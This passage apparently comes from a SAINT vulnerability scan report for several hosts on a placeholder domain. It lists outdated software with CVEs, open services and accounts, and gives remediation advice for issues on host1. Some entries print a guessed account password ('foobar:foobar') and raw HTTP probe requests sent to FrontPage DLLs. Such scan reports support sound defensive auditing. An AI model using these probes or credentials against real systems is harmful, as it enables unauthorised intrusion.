host3.domain.com info RPC service: 100008-1 walld (32777/udp)        
host3.domain.com info RPC service: 100011-1 rquotad (32774/udp)        
host3.domain.com info RPC service: 100012-1 sprayd (32776/udp)        
host3.domain.com info RPC service: 100021-1 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-1 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-2 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-2 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-3 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-3 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-4 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-4 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100024-1 status (32771/tcp)        
host3.domain.com info RPC service: 100024-1 status (32772/udp)        
host3.domain.com info RPC service: 100068-2 (32779/udp)        
host3.domain.com info RPC service: 100068-2 (33095/tcp)        
host3.domain.com info RPC service: 100068-3 (32779/udp)        
host3.domain.com info RPC service: 100068-3 (33095/tcp)        
host3.domain.com info RPC service: 100068-4 (32779/udp)        
host3.domain.com info RPC service: 100068-4 (33095/tcp)        
host3.domain.com info RPC service: 100068-5 (32779/udp)        
host3.domain.com info RPC service: 100068-5 (33095/tcp)        
host3.domain.com info RPC service: 100083-1 (32775/tcp)        
host3.domain.com info RPC service: 100221-1 (32773/tcp)        
host3.domain.com info RPC service: 100232-10 sadmind (32773/udp)        
host3.domain.com info RPC service: 100235-1 (32795/tcp)        
host3.domain.com info RPC service: 100249-1 (33065/tcp)        
host3.domain.com info RPC service: 100249-1 (33313/udp)        
host3.domain.com info RPC service: 300598-1 (33064/tcp)        
host3.domain.com info RPC service: 300598-1 (33312/udp)        
host3.domain.com info RPC service: 805306368-1 (33064/tcp)        
host3.domain.com info RPC service: 805306368-1 (33312/udp)        
host3.domain.com info User: bin        
host3.domain.com info User: foobar        
host3.domain.com info User: root        
host3.domain.com info User: smithrj        
host3.domain.com info User: sys        
host4.domain.com concern vulnerable Eudora version: 6.2 Mail     no
host4.domain.com concern vulnerability in Macromedia Flash Player: 8.0.22.0 Other CVE-2006-0024 5.1 no
host4.domain.com concern Internet Explorer Create Text Range code injection Windows OS CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 10.0 no
host4.domain.com concern Internet Explorer JS stack overflow Windows OS CVE-2006-0753 CVE-2006-0830 7.5 no
host4.domain.com concern vulnerable iTunes version: 6 Other     no
host4.domain.com concern Microsoft Excel and Office routing slip vulnerabilities Windows OS CVE-2005-4131 CVE-2006-0009 CVE-2006-0028 CVE-2006-0029 CVE-2006-0030 CVE-2006-0031 6.8 no
host4.domain.com concern vulnerable Mozilla Thunderbird version: 0.7.2 Mail CVE-2004-0902 CVE-2004-0903 CVE-2004-0904 CVE-2004-0905 CVE-2004-0906 CVE-2004-0907 CVE-2004-0908 CVE-2004-0909 CVE-2004-1316 CVE-2005-0142 CVE-2005-0148 CVE-2005-0149 CVE-2005-0255 CVE-2005-0399 CVE-2005-0590 CVE-2005-0989 CVE-2005-1159 CVE-2005-1160 CVE-2005-1532 CVE-2005-2261 CVE-2005-2265 CVE-2005-2266 CVE-2005-2269 CVE-2005-2270 10.0 no
host4.domain.com concern vulnerable Mozilla Firefox version: 1.0.3 Web CVE-2005-1476 CVE-2005-1477 CVE-2005-1531 CVE-2005-1532 CVE-2005-1937 CVE-2005-2260 CVE-2005-2261 CVE-2005-2262 CVE-2005-2263 CVE-2005-2264 CVE-2005-2265 CVE-2005-2266 CVE-2005-2267 CVE-2005-2268 CVE-2005-2269 CVE-2005-2270 CVE-2005-2701 CVE-2005-2702 CVE-2005-2703 CVE-2005-2704 CVE-2005-2705 CVE-2005-2706 CVE-2005-2707 CVE-2005-2871 CVE-2005-2968 CVE-2005-3089 7.5 no
host4.domain.com concern vulnerable Mozilla version: 1.7.7 Web CVE-2005-1476 CVE-2005-1531 CVE-2005-1532 CVE-2005-1937 CVE-2005-2260 CVE-2005-2261 CVE-2005-2263 CVE-2005-2265 CVE-2005-2266 CVE-2005-2268 CVE-2005-2269 CVE-2005-2270 CVE-2005-2701 CVE-2005-2702 CVE-2005-2703 CVE-2005-2704 CVE-2005-2705 CVE-2005-2706 CVE-2005-2707 CVE-2005-2871 CVE-2005-2968 CVE-2005-4134 CVE-2006-0292 7.5 no
host4.domain.com concern vulnerable Netscape Navigator version: 4.78 Web CVE-2004-0718 CVE-2004-0722 CVE-2004-1160 CVE-2005-0399 CVE-2005-0989 CVE-2005-1156 CVE-2005-1157 CVE-2005-1160 10.0 no
host4.domain.com concern Outlook Express Windows Address Book vulnerability Mail CVE-2006-0014 5.1 no
host4.domain.com concern vulnerable QuickTime version: 7.0.3 Other CVE-2005-2340 CVE-2005-3707 CVE-2005-3708 CVE-2005-3709 CVE-2005-3710 CVE-2005-3711 CVE-2005-3713 CVE-2005-4092 CVE-2005-4128 7.5 no
host4.domain.com concern Sunncomm ActiveX control enabled Web     no
host4.domain.com concern vulnerable Winamp version: 5.13 Other CVE-2006-0708 CVE-2006-0720 9.3 no
host4.domain.com concern Windows Plug and Play vulnerability Windows OS CVE-2005-1983 10.0 no
host4.domain.com concern Run key allows write access Windows OS CVE-1999-0589 10.0 no
host4.domain.com concern Uninstall key allows write access Windows OS CVE-1999-0589 10.0 no
host4.domain.com concern HTML Help cross-domain vulnerability Windows OS CVE-2004-1043 5.0 no
host4.domain.com concern Microsoft Data Access Component vulnerability Windows OS CVE-2006-0003 5.1 no
host4.domain.com concern Windows Explorer COM object command execution Windows OS CVE-2004-2289 CVE-2006-0012 10.0 no
host4.domain.com potential Internet Explorer Shell.Explorer object enabled Windows OS CVE-2004-0985 10.0 no
host4.domain.com potential last user name shown in login box Windows OS CVE-1999-0592 10.0 no
host4.domain.com potential application uses vulnerable libpng version: Thunderbird 0.7.2 Other CVE-2004-0597 CVE-2004-0598 CVE-2004-0599 10.0 no
host4.domain.com potential Possible vulnerability in Microsoft UPnP Windows OS CVE-2001-0876 CVE-2001-0877 7.5 no
host4.domain.com potential Outlook Express NNTP buffer overflow Mail CVE-2005-1213 7.5 no
host4.domain.com potential Outlook Express default news server account disclosure Mail CVE-2005-2226 5.0 no
host4.domain.com potential User DoeJ has never logged in Windows OS     no
host4.domain.com potential User sainttest has never logged in Windows OS     yes
host4.domain.com potential weak maximum password age policy (730 days) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential weak minimum password age policy (0 days) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential weak password history policy (3) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential non-administrative users can act as part of the operating system Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can bypass traverse checking Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can create token object Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can replace a process level token Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential Password never expires for user DoeJ Windows OS     no
host4.domain.com potential Password never expires for user foobars Windows OS     no
host4.domain.com potential Windows TCP/IP Stack not hardened Other CVE-2005-0688 CVE-2005-1649 5.0 no
host4.domain.com potential Jet Database Engine input validation problems Windows OS CVE-2005-0944 7.5 no
host4.domain.com service 1025/UDP        
host4.domain.com service 1026/UDP        
host4.domain.com service 1107/UDP        
host4.domain.com service 1118/UDP        
host4.domain.com service 1123/UDP        
host4.domain.com service 1129/UDP        
host4.domain.com service 1900/UDP        
host4.domain.com service SMB        
host4.domain.com service epmap (135/TCP)        
host4.domain.com service isakmp (500/UDP)        
host4.domain.com service microsoft-ds (445/TCP)        
host4.domain.com service microsoft-ds (445/UDP)        
host4.domain.com service netbios-dgm (138/UDP)        
host4.domain.com service netbios-ns (137/UDP)        
host4.domain.com service ntp (123/UDP)        
host4.domain.com info User: Administrator        
host4.domain.com info User: DoeJ        
host4.domain.com info User: Guest        
host4.domain.com info User: HelpAssistant        
host4.domain.com info User: HelpServicesGroup        
host4.domain.com info User: IME_ADMIN        
host4.domain.com info User: IME_USER        
host4.domain.com info User: SUPPORT_388945a0        
host4.domain.com info User: foobars        
host4.domain.com info User: sainttest        
host4.domain.com info Windows service: AhnLab Task Scheduler        
host4.domain.com info Windows service: Application Layer Gateway Service        
host4.domain.com info Windows service: Automatic Updates        
host4.domain.com info Windows service: COM+ Event System        
host4.domain.com info Windows service: Computer Browser        
host4.domain.com info Windows service: Creative Service for CDROM Access        
host4.domain.com info Windows service: Cryptographic Services        
host4.domain.com info Windows service: DCOM Server Process Launcher        
host4.domain.com info Windows service: DHCP Client        
host4.domain.com info Windows service: DNS Client        
host4.domain.com info Windows service: Distributed Link Tracking Client        
host4.domain.com info Windows service: Error Reporting Service        
host4.domain.com info Windows service: Event Log        
host4.domain.com info Windows service: Help and Support        
host4.domain.com info Windows service: IPSEC Services        
host4.domain.com info Windows service: Logical Disk Manager        
host4.domain.com info Windows service: McAfee Framework Service        
host4.domain.com info Windows service: Net Logon        
host4.domain.com info Windows service: Network Associates McShield        
host4.domain.com info Windows service: Network Associates Task Manager        
host4.domain.com info Windows service: Network Connections        
host4.domain.com info Windows service: Network Location Awareness (NLA)        
host4.domain.com info Windows service: Plug and Play        
host4.domain.com info Windows service: Print Spooler        
host4.domain.com info Windows service: Protected Storage        
host4.domain.com info Windows service: Remote Access Connection Manager        
host4.domain.com info Windows service: Remote Procedure Call (RPC)        
host4.domain.com info Windows service: Remote Procedure Call (RPC) Locator        
host4.domain.com info Windows service: Remote Registry        
host4.domain.com info Windows service: Removable Storage        
host4.domain.com info Windows service: SSDP Discovery Service        
host4.domain.com info Windows service: Secondary Logon        
host4.domain.com info Windows service: Security Accounts Manager        
host4.domain.com info Windows service: Server        
host4.domain.com info Windows service: Shell Hardware Detection        
host4.domain.com info Windows service: SysTrack Agent        
host4.domain.com info Windows service: System Event Notification        
host4.domain.com info Windows service: System Restore Service        
host4.domain.com info Windows service: TCP/IP NetBIOS Helper        
host4.domain.com info Windows service: Task Scheduler        
host4.domain.com info Windows service: Telephony        
host4.domain.com info Windows service: Terminal Services        
host4.domain.com info Windows service: Themes        
host4.domain.com info Windows service: WebClient        
host4.domain.com info Windows service: Windows Audio        
host4.domain.com info Windows service: Windows Firewall/Internet Connection Sharing (ICS)        
host4.domain.com info Windows service: Windows Management Instrumentation        
host4.domain.com info Windows service: Windows Time        
host4.domain.com info Windows service: Wireless Zero Configuration        
host4.domain.com info Windows service: Workstation        
host5.domain.com critical Anthill 0.1.6.1 is vulnerable Web CVE-2002-0548 CVE-2002-0549 7.5 no
host5.domain.com critical OpenSSH 3.1p1 may be vulnerable Login/Shell CVE-2002-0575 CVE-2002-0639 CVE-2002-0640 CVE-2003-0190 CVE-2003-0682 CVE-2003-0693 CVE-2003-0695 CVE-2005-2798 10.0 yes
host5.domain.com concern Web server allows cross-site tracing Web     yes
host5.domain.com concern vulnerable Horde Accounts version: 2.1 Web CVE-2005-1316 4.3 no
host5.domain.com concern vulnerable Horde Forwards version: 2.2 Web CVE-2005-1318 4.3 no
host5.domain.com concern vulnerable Horde Kronolith version: 1.1 Web CVE-2005-1314 4.3 no
host5.domain.com concern vulnerable Horde Mnemo version: 1.1 Web CVE-2005-1320 4.3 no
host5.domain.com concern vulnerable Horde Nag version: 1.1 Web CVE-2005-1322 4.3 no
host5.domain.com concern vulnerable Horde Passwd version: 2.2 Web CVE-2005-1313 4.3 no
host5.domain.com concern vulnerable Horde Turba version: 1.2 Web CVE-2005-1315 4.3 no
host5.domain.com concern vulnerable Horde Vacation version: 2.2 Web CVE-2005-1321 4.3 no
host5.domain.com concern vulnerable Horde IMP version: 3.2.1 Mail CVE-2004-0584 CVE-2004-1443 CVE-2005-1319 CVE-2005-4080 6.8 no
host5.domain.com concern vulnerable Horde version: 2.2.3 Web CVE-2003-0728 CVE-2005-0378 CVE-2005-0961 CVE-2005-3570 9.3 no
host5.domain.com potential possible vulnerability in wu-ftpd 2.6.2 File Transfer CVE-2003-0466 CVE-2004-0185 10.0 no
host5.domain.com potential possible vulnerability in OpenSSL 0.9.7d Other CVE-2005-2969 5.0 no
host5.domain.com potential possible RSA SecurID Web Agent redirect buffer overflow Other     yes
host5.domain.com potential possible heap overflow in RSA SecurID Web Agent Other CVE-2005-1471 CVE-2005-4734 7.5 no
host5.domain.com potential SSL server accepts SSLv2 protocol Other     no
host5.domain.com potential SSL server accepts weak ciphers Other     no
host5.domain.com potential TCP reset using approximate sequence number Other CVE-2004-0230 5.0 no
host5.domain.com service 1414/TCP        
host5.domain.com service 1515/TCP        
host5.domain.com service FTP        
host5.domain.com service SAINT        
host5.domain.com service SMTP        
host5.domain.com service SSH        
host5.domain.com service WWW        
host5.domain.com service WWW (Secure)        
host5.domain.com service WWW (non-standard port 81)        

3.0  Details

The following sections provide details on the specific vulnerabilities detected on each host.

3.1  host1.domain.com

IP Address: 172.16.0.1 Host type: Windows 2000 Service Pack 1
Scan time: Jun 29 14:31:35 2009 Netbios Name: HOST1


Download.Ject detected on web server
Severity: Critical Problem

Created 06/28/04

Impact

For web servers, a remote attacker has gained access to the server and added malicious content to the web site. For web clients, the web browser may have installed a keystroke logger when visiting a compromised web site. The keystroke logs are automatically sent to a remote web site.

Background

Download.Ject, also known as JS.Scob, employs a new two-phased attack technique, in which an attacker breaks into a vulnerable web server and installs code which in turn attacks visitors to the web site.

The Problem

Both servers and clients can be infected by Download.Ject. The problem begins with the server. An attacker breaks into a vulnerable Microsoft IIS web server and adds JavaScript code to the web site's footer.

The second part of the problem occurs when a client visits the compromised server using a vulnerable version of Microsoft Internet Explorer. The attacker's JavaScript code, which is appended to every web page, redirects the browser to an external address belonging to a remote attacker. The remote web page exploits the Internet Explorer Modal Dialog Zone Bypass vulnerability. This exploit runs the attack code which downloads and installs a keystroke logger onto the system by exploiting the Internet Explorer ADODB.Stream Object File Installation Weakness.

Once the keystroke logger is installed on the system, it attempts to collect login and password combinations and saves them locally in an HTML form. The form data is then uploaded to a number of remote sites.

Resolution

Run a virus scan and delete or repair any files infected with Download.Ject or JS.Scob. On IIS web servers, disable the document footer or ensure that the footer is valid in the Documents tab of the Web Site Properties.

To avoid becoming infected, install the fix for the Internet Explorer Modal Dialog Zone Bypass and ADODB.Stream Object File Installation vulnerabilities when available. Until the fix is installed, disable client-side scripting and active content in the Internet zone in Microsoft Internet Explorer.

Where can I read more about this?

For more information, see the Microsoft, and Symantec.

Technical Details

Service: http

Guessed password to windows account (foobar:foobar)
Severity: Critical Problem

Updated 06/15/07
CVE 1999-0501
CVE 1999-0502
CVE 1999-0503
CVE 1999-0504
CVE 1999-0505
CVE 1999-0506

Impact

An attacker who is able to guess the password to a user account could gain shell access to the system with the privileges of the user. From there it is often trivial to gain complete control of the system.

Background

Passwords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access.

The Problem

Administrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system.

Related CVE entries:
CVE 2002-1629 Multi-Tech ProxyServer
CVE 2005-3595 Windows XP Home Edition
CVE 2007-3232 IBM Totalstorage DS400

Cisco 2700 Series Wireless Location Appliance Default Password

10/27/06
CVE 2006-5288
The Cisco 2700 Series Wireless Location appliance is an internet connectivity device. It is exposed to a default administrative password issue. Versions prior to 2.1.34 are affected.

Resolution

Protect all accounts with a password that cannot be guessed. Require users to choose passwords which are eight characters long, including numeric and non-alphanumeric characters, and which are not based on the login name or any other personal information about the user. Enforce this policy using a utility such as npasswd in place of the default UNIX passwd program. Check the strength of all account passwords periodically using a password cracking utility such as Crack for Unix.

For Cisco 2700 Series Wireless Location Appliance, change the password or mitigate as described in cisco-air-20061013-wla.

Where can I read more about this?

Walter Belgers' paper, UNIX password security, is a good reference on strengthening passwords.

The Cisco 2700 Series WLA default password was described in cisco-sa-2006-1012-wla and Bugtraq ID 20490.

The IBM Totalstorage DS400 default password was posted to Full Disclosure.

Technical Details

Service: netbios-ssn
foobar:foobar

MS FrontPage Server Extension Vulnerability: /_vti_bin/shtml.dll
Severity: Critical Problem CVE: CVE-2003-0824

Updated 04/12/06

Impact

A remote attacker could take control of the web site, and possibly the system as well.

Background

Web servers which include Microsoft FrontPage Server Extensions have special accounts to authenticate web server administrators, web page authors, and web site visitors. The account names and encrypted passwords are stored in FrontPage password files in the /_vti_pvt directory. The password files are named service.pwd on Microsoft web servers, and administrators.pwd, authors.pwd, and users.pwd on Netscape web servers.

An integral feature of FrontPage Server Extensions is a remote debug capability. This functionality enables users to remotely connect to a server running FrontPage Server Extensions and remotely debug content using, for example, Visual InterDev.

FrontPage Server Extensions also come with the SmartHTML (WebBot) interpreter. This functionality is made up of a variety of dynamic link library files, and exists to support certain types of dynamic web content. Web developers may choose to insert a FrontPage WebBot (actually a specially formatted HTML comment) in a web page. When the FrontPage Editor saves the web page, a FrontPage Server Extensions application scans the page for embedded WebBot components and replaces them with the appropriate HTML text.

FrontPage Server Extensions can also include an optional subcomponent called Visual Studio Remote Application Deployment (RAD) support. This support allows Visual InterDev users to register objects on the web server.

The Problem

MS FrontPage Server Extensions cross-site scripting vulnerability

04/12/06
CVE 2006-0015
There is a cross-site scripting vulnerability that could allow an attacker to run client-side script on behalf of an FPSE user. Attempts to exploit this vulnerability require user interaction. An attacker who successfully exploited this vulnerability against an administrator could take complete control of a Front Page Server Extensions 2002 server.

fp30reg.dll Remote Debug Buffer Overflow

11/19/03
CVE 2003-0822
There is a buffer overflow vulnerability in the remote debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions 2000 and 2002. This vulnerability allows remote attackers to execute arbitrary code via a carefully crafted chunked encoded request.

SmartHTML Denial of Service

11/19/03
CVE 2003-0824
A vulnerability in the SmartHTML interpreter (shtml.dll) could allow an attacker to temporarily consume all available CPU resources through malicious HTTP requests.

Buffer overflow in Visual Studio RAD support

CVE 2001-0341
Due to an unchecked buffer in the Visual Studio RAD sub-component of FrontPage Server Extensions, it could be possible for a remote attacker to execute arbitrary commands with IUSR_machinename privileges, or in some cases SYSTEM privileges. This vulnerability can only be exploited if the Visual Studio RAD sub-component is installed, which is not the case by default.

Password File Access

The FrontPage password file(s) indicated on the previous screen, next to the link to this tutorial, are readable by an unprivileged web user. An attacker could crack the encrypted passwords and gain unauthorized access to the web site. If any users' FrontPage passwords are the same as their system passwords, the system could be compromised as well.

fpcount.exe buffer overflow

10/22/02
CVE 1999-1376
The fpcount.exe utility which is installed with FrontPage Server Extensions versions prior to 98 contains a remotely exploitable buffer overflow vulnerability.

Resolutions

To fix the Front Page Service Extensions Cross-site scripting vulnerability and the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, apply the patch indicated in Microsoft Security Bulletin 06-017.

To fix the vulnerability in the Visual Studio RAD support, apply the patch indicated in Microsoft Security Bulletin 01-035.

To secure the FrontPage password file, set the permissions on the file(s) to be more restrictive. The exact permissions which should be used are not specified. Use the most restrictive permissions possible without denying access to legitimate users.

On Windows NT systems:

  1. Find the file in Windows Explorer
  2. Click on the file with the right mouse button
  3. Select Properties
  4. Click on the Security Tab
  5. Click on the Permissions button
  6. Change or remove permissions on the file as necessary.
On Unix systems:
Use the chmod command.

To fix the buffer overflow in fpcount.exe, upgrade to FrontPage Server Extensions 98 or higher.

Where can I read more about this?

For more information on the Front Page Server Extensions cross-site scripting vulnerabilities see Microsoft Security Bulletin 06-017 and Bugtraq ID 17452.

For more information on the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, see Microsoft Security Bulletin 03-051 and Secunia Advisory SA10195.

For more information on the vulnerability in the Visual Studio RAD support, see Microsoft Security Bulletin 01-035 and NSFOCUS Security Advisory 2001-03.

See the Rhino 9 Advisory for more information about the password file vulnerability.

The fpcount.exe vulnerability was posted to Bugtraq archive 11943.

Technical Details

Service: http
Sent:
POST /_vti_bin/shtml.dll HTTP/1.0
Host: host1.domain.com:80


Received:
HTTP/1.1 200 OK
And:
<HTML><BODY>Cannot run the FrontPage Server Extensions' Smart HTML interpreter on this non-HTML page: &quot;&quot;</BODY></HTML>

MS FrontPage Server Extension Vulnerability: remote debug
Severity: Critical Problem CVE: CVE-2003-0822

Updated 04/12/06

Impact

A remote attacker could take control of the web site, and possibly the system as well.

Background

Web servers which include Microsoft FrontPage Server Extensions have special accounts to authenticate web server administrators, web page authors, and web site visitors. The account names and encrypted passwords are stored in FrontPage password files in the /_vti_pvt directory. The password files are named service.pwd on Microsoft web servers, and administrators.pwd, authors.pwd, and users.pwd on Netscape web servers.

An integral feature of FrontPage Server Extensions is a remote debug capability. This functionality enables users to remotely connect to a server running FrontPage Server Extensions and remotely debug content using, for example, Visual InterDev.

FrontPage Server Extensions also come with the SmartHTML (WebBot) interpreter. This functionality is made up of a variety of dynamic link library files, and exists to support certain types of dynamic web content. Web developers may choose to insert a FrontPage WebBot (actually a specially formatted HTML comment) in a web page. When the FrontPage Editor saves the web page, a FrontPage Server Extensions application scans the page for embedded WebBot components and replaces them with the appropriate HTML text.

FrontPage Server Extensions can also include an optional subcomponent called Visual Studio Remote Application Deployment (RAD) support. This support allows Visual InterDev users to register objects on the web server.

The Problem

MS FrontPage Server Extensions cross-site scripting vulnerability

04/12/06
CVE 2006-0015
There is a cross-site scripting vulnerability that could allow an attacker to run client-side script on behalf of an FPSE user. Attempts to exploit this vulnerability require user interaction. An attacker who successfully exploited this vulnerability against an administrator could take complete control of a Front Page Server Extensions 2002 server.

fp30reg.dll Remote Debug Buffer Overflow

11/19/03
CVE 2003-0822
There is a buffer overflow vulnerability in the remote debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions 2000 and 2002. This vulnerability allows remote attackers to execute arbitrary code via a carefully crafted chunked encoded request.

SmartHTML Denial of Service

11/19/03
CVE 2003-0824
A vulnerability in the SmartHTML interpreter (shtml.dll) could allow an attacker to temporarily consume all available CPU resources through malicious HTTP requests.

Buffer overflow in Visual Studio RAD support

CVE 2001-0341
Due to an unchecked buffer in the Visual Studio RAD sub-component of FrontPage Server Extensions, it could be possible for a remote attacker to execute arbitrary commands with IUSR_machinename privileges, or in some cases SYSTEM privileges. This vulnerability can only be exploited if the Visual Studio RAD sub-component is installed, which is not the case by default.

Password File Access

The FrontPage password file(s) indicated on the previous screen, next to the link to this tutorial, are readable by an unprivileged web user. An attacker could crack the encrypted passwords and gain unauthorized access to the web site. If any users' FrontPage passwords are the same as their system passwords, the system could be compromised as well.

fpcount.exe buffer overflow

10/22/02
CVE 1999-1376
The fpcount.exe utility which is installed with FrontPage Server Extensions versions prior to 98 contains a remotely exploitable buffer overflow vulnerability.

Resolutions

To fix the Front Page Service Extensions Cross-site scripting vulnerability and the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, apply the patch indicated in Microsoft Security Bulletin 06-017.

To fix the vulnerability in the Visual Studio RAD support, apply the patch indicated in Microsoft Security Bulletin 01-035.

To secure the FrontPage password file, set the permissions on the file(s) to be more restrictive. The exact permissions which should be used are not specified. Use the most restrictive permissions possible without denying access to legitimate users.

On Windows NT systems:

  1. Find the file in Windows Explorer
  2. Click on the file with the right mouse button
  3. Select Properties
  4. Click on the Security Tab
  5. Click on the Permissions button
  6. Change or remove permissions on the file as necessary.
On Unix systems:
Use the chmod command.

To fix the buffer overflow in fpcount.exe, upgrade to FrontPage Server Extensions 98 or higher.

Where can I read more about this?

For more information on the Front Page Server Extensions cross-site scripting vulnerabilities see Microsoft Security Bulletin 06-017 and Bugtraq ID 17452.

For more information on the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, see Microsoft Security Bulletin 03-051 and Secunia Advisory SA10195.

For more information on the vulnerability in the Visual Studio RAD support, see Microsoft Security Bulletin 01-035 and NSFOCUS Security Advisory 2001-03.

See the Rhino 9 Advisory for more information about the password file vulnerability.

The fpcount.exe vulnerability was posted to Bugtraq archive 11943.

Technical Details

Service: http
Sent:
POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.0
Host: host1.domain.com:80
Transfer-Encoding: chunked

1

X
0



Received:
HTTP/1.1 400 Bad Request

Folder traversal in IIS (Double Decoding)
Severity: Critical Problem CVE: CVE-2001-0333

Updated 10/15/08

Impact

An attacker could send a specially constructed request which crashes the server or executes arbitrary code with the privileges of the web server.

Background

Microsoft IIS web servers accept requests for a number of different types of files. The most common methods of requesting a file are GET and POST. In addition to the request itself, the web browser sends the IIS server additional information called headers which are not seen by the user. Information in the header can include browser type, content type, content length, and other information.

Some of the file types for which IIS may accept requests are .HTR files (for remote administration of passwords), .IDC files (Internet Database Connectors), .STM files (server side include files), .PRINTER files (printers), .IDA files (Internet Data Administration), .IDQ files (Internet Data Query), and .ASP files (Active Server Pages). Whenever any file of one of these types is requested by a client, a corresponding DLL file is executed on the server, regardless of whether or not the requested file actually exists on the server.

IIS supports redirection, which allows a user to specify that requests for a particular URL on the server should be redirected such that the user's browser loads a file from another directory, a network share, or a URL on another web server.

The Problems

Integer Overflow in IPP Service

10/15/08
CVE 2008-1446
MS08-062 fixes a vulnerability in ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 that could allow a remote, authenticated attacker to execute arbitrary code via an HTTP POST request.

IIS ASP Remote Code Execution

02/14/08
CVE 2008-0075
Microsoft Security Bulletin 08-006 announced a vulnerability in IIS that could allow remote code execution. The vulnerability exists in the way that IIS handles input to ASP Web pages. An attacker who could exploit the vulnerability can perform actions on the IIS server with the same rights as the Worker Process Identity (WPI).

Remote Code Execution in IIS 5.1

07/10/07
CVE 2005-4360
A flaw in IIS 5.1 dealing with .dll requests was previously believed to only allow denial of service but has been re-evaluated by Microsoft and determined to allow remote code execution.

ASP Upload Command Execution

07/12/06
CVE 2006-0026
IIS 5.0, 5.1, and 6.0 are affected by a buffer overflow when processing ASP files. A remote attacker could execute arbitrary commands by uploading a specially crafted ASP file onto the web server, and then causing IIS to process it. An attacker would need to have valid login credentials in order to exploit this vulnerability unless the web server has been configured to allow anonymous uploads to the web site.

.dll Request Denial of Service in IIS 5.1

12/21/05
CVE 2005-4360
A flaw in IIS 5.1 could allow a remote attacker to terminate the web service by sending a specially crafted request for a .dll file four times in succession. The requested path must include an executable virtual directory on the web server, but the file does not need to exist in order for the attack to succeed. In its default configuration, IIS will restart after such an attack, but repeated attacks could lead to a sustained denial of service.

Multiple Vulnerabilities in IIS 4.0 - 5.1

04/11/02
Microsoft Security Bulletin 02-018 announced ten newly discovered vulnerabilities affecting IIS 4.0 through 5.1, ranging in impact from denial of service to execution of arbitrary code. Each of the following vulnerabilities affects IIS 4.0, 5.0, and/or 5.1:

  • Two buffer overflows affecting chunked encoding transfers via Active Server Pages (ASP) (CVE 2002-0079 CVE 2002-0147)
  • A buffer overflow in the processing of HTTP headers by spoofing the check of the delimiter fields (CVE 2002-0150)
  • A buffer overflow in the processing of server-side includes in ASP files (CVE 2002-0149)
  • A buffer overflow affecting the HTR ISAPI extension (CVE 2002-0071)
  • Denial-of-service conditions in the processing of error messages from ISAPI extensions and the processing of FTP status requests (CVE 2002-0072 CVE 2002-0073)
  • Three cross-site scripting vulnerabilities (CVE 2002-0074 CVE 2002-0075 CVE 2002-0148)

11/05/02
Microsoft Security Bulletin 02-062 announced four more vulnerabilities affecting IIS 4.0, 5.0, and/or 5.1:

  • A privilege elevation vulnerability affecting the way ISAPIs are launched when configured to run out of process (CVE 2002-0869)
  • A denial-of-service vulnerability in the processing of WebDAV requests (CVE 2002-1182)
  • An error which weakens the access control on uploading of .COM files to write-enabled virtual directories (CVE 2002-1180)
  • Two cross-site scripting vulnerabilities affecting the administrative web page (CVE 2002-1181)

06/03/03
Microsoft Security Bulletin 03-018 announced four more vulnerabilities affecting IIS 4.0, 5.0, and/or 5.1:

  • A cross-site scripting vulnerability affecting pages which are redirected to another page (CVE 2003-0223)
  • A buffer overflow in the processing of pages containing server-side includes, which could be exploited if an attacker is able to upload such pages (CVE 2003-0224)
  • A denial of service vulnerability in the processing of ASP pages, which could be exploited if an attacker is able to upload ASP pages (CVE 2003-0225)
  • A denial of service vulnerability in the processing of overly long WebDAV requests (CVE 2003-0226)

IIS 4.0 Redirection Buffer Overflow

07/14/04
CVE 2004-0205
A buffer overflow in IIS 4.0 could allow a remote attacker to execute arbitrary commands if permanent redirects are enabled. IIS 5 and 6 are not affected.

Chunked .HTR buffer overflow

06/13/02
CVE 2002-0364
IIS web servers support chunked encoding, in which HTTP POST data is sent to the server in multiple parts. A heap overrun vulnerability in the ISAPI filter which handles requests for .HTR files could allow a remote attacker to execute arbitrary commands when chunked encoding is used. The requested .HTR file usually does not need to exist on the server in order for the vulnerability to be exploited.

IIS 4.0 and 5.0 are affected by this vulnerability if the .HTR application filter is enabled and the patch has not been applied. This is not the same vulnerability as the one described above.

Buffer Overflows in IIS 5.0

06/18/01
CVE 2001-0241
CVE 2001-0500

The DLLs which IIS 5.0 uses to process requests for .PRINTER files on Windows 2000, and for .IDA and .IDQ files on any Windows platform that has Indexing Services installed, contain buffer overflows. A remote attacker could execute arbitrary commands with full system privileges or create a denial of service by sending a specially crafted request for a .PRINTER, .IDA, or .IDQ file. In most cases the requested file does not need to exist on the web server in order for this vulnerability to be exploited, and exploitation of the DLLs that come with Indexing Services is possible even if Indexing Services are not running.

Due to the nature of this vulnerability, it could not be confirmed by a network scan (unless the dangerous tests option was chosen). The server is not vulnerable if any of the following conditions apply:

  • The patches for this vulnerability have already been applied
  • The mapping for the corresponding ISAPIs have been removed
